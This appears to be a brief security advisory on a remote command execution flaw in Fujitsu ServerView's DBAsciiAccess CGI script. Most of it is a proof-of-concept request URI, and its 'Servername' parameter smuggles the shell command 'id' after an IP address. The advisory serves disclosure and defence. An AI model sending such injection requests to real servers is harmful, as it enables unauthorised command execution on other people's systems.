|
Fujitsu ServerView DBASCIIAccess Remote Command Execution Vulnerability
An attacker can exploit this issue via a browser. The following proof-of-concept URI is available (note that this URI has been edited for readability): http://www.example.com/cgi-bin/ServerView/ SnmpView/DBAsciiAccess ?SSL= &Application=ServerView/SnmpView &Submit=Submit &UserID=1 &Profile= &DBAccess=ASCII &Viewing=-1 &Action=Show &ThisApplication=TestConnectivityFrame &DBElement=ServerName &DBValue=bcmes &DBList=snism &UserValue= &DBTableList=SERVER_LIST &Sorting= &ParameterList=What--primary,, OtherCommunity--public,, SecondIP--,, Timeout--5,, Community--public,, ServerName--bcmes,, Servername--127.0.0.1;id;,, # vulnerable parameter SType--Server |
|
Privacy Statement |